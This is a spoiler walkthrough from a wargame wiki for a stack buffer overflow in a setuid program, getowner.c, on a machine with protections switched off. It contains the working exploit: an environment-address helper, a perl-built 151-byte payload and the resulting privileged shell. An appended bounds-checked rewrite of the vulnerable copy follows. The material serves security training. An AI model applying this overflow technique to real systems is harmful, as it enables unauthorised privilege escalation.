
Level 2

From MRL Wiki - level 2

Spoilers Below

Source code is provided for getowner.c. Line 20 contains an unbounded strcpy from user-supplied input to a 128-byte buffer buf.

20: strcpy(&buf[strlen(buf)], filename);

This is a straightforward classic stack overflow. Please note that the system this is running on has no stack randomization, non-executable stack, or other protective measures.

The string is supplied by setting the environment variable filename. Before the user input is copied, "/tmp/" is placed at the beginning of the buffer. Even though it looks like only 127 bytes should trigger the overflow (123 to finish filling buf and 4 to overwrite the filename pointer), there is some additional data on the stack that needs to be overwritten as well, so it actually takes 151 bytes.



#include <stdio.h>
#include <stdlib.h>

/* Prints the address of the BISH environment variable in this process's
 * environment; compiled as ./getenv in the session below. */
int main(void) {
        printf("$BISH at %p\n", getenv("BISH"));
        return 0;
}

level2@blackbox:/tmp/tyler2$ ./getenv
$BISH at 0xbfffdd8a
level2@blackbox:/tmp/tyler2$ export filename=`perl -e'print "A"x151 . "\x8a\xdd\xff\xbf"'`
level2@blackbox:/tmp/tyler2$ ~/getowner
The owner of this file is: 0
sh-3.1$ id
uid=1003(level2) gid=1005(gamers) euid=1004(level3) groups=1003(level2),1005(gamers)
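As an added defensive counterpart (not code from the original page or from getowner.c), here is the same "/tmp/" + filename construction rewritten with a length check so the 128-byte buffer cannot be overrun. The function names build_path, make_tmp_path and built_length are chosen here; the 128-byte size and the "/tmp/" prefix are taken from the description above.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 128  /* same buffer size as getowner.c's buf */

/* Bounds-checked replacement for the page's line 20:
 *     strcpy(&buf[strlen(buf)], filename);
 * Appends `filename` to the string already in `buf` only if the result
 * plus its NUL fits in `size` bytes. Returns 0 on success, -1 if the
 * input would overflow; `buf` is left unchanged on failure. */
int build_path(char *buf, size_t size, const char *filename)
{
    size_t used = strlen(buf);       /* bytes already in buf ("/tmp/") */
    size_t need = strlen(filename);  /* bytes the caller wants to append */

    if (used >= size)                /* buf is not a proper string for this size */
        return -1;
    /* used + need + 1 must be <= size; written as need < size - used so
     * the subtraction cannot wrap (used < size was checked above). */
    if (need >= size - used)
        return -1;
    memcpy(buf + used, filename, need + 1);  /* copies the NUL as well */
    return 0;
}

/* Mirrors getowner.c's setup: start from "/tmp/", then append filename. */
int make_tmp_path(char *buf, size_t size, const char *filename)
{
    if (size < sizeof("/tmp/"))
        return -1;
    strcpy(buf, "/tmp/");  /* safe: size checked just above */
    return build_path(buf, size, filename);
}

/* Helper for checking the boundary with a constructed filename of n 'A's.
 * Returns the length of the built path when it fits in a BUF_SIZE buffer,
 * or 0 when the input is rejected. */
size_t built_length(size_t n)
{
    char buf[BUF_SIZE];
    char *name = malloc(n + 1);
    size_t len = 0;
    if (name == NULL)
        return 0;
    memset(name, 'A', n);
    name[n] = '\0';
    if (make_tmp_path(buf, sizeof buf, name) == 0)
        len = strlen(buf);
    free(name);
    return len;
}
```

With this check in place, the 151-byte string used in the session above is rejected instead of being written past the end of buf.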


This page has been accessed 2,372 times. This page was last modified on 5 September 2008, at 14:56.


Main Page
Community portal
Current events
Recent changes
Random page
Edit this page
Editing help
This page
Discuss this page
New section
Printable version
Page history
What links here
Related changes
My pages
Log in / create account
Special pages
New pages
File list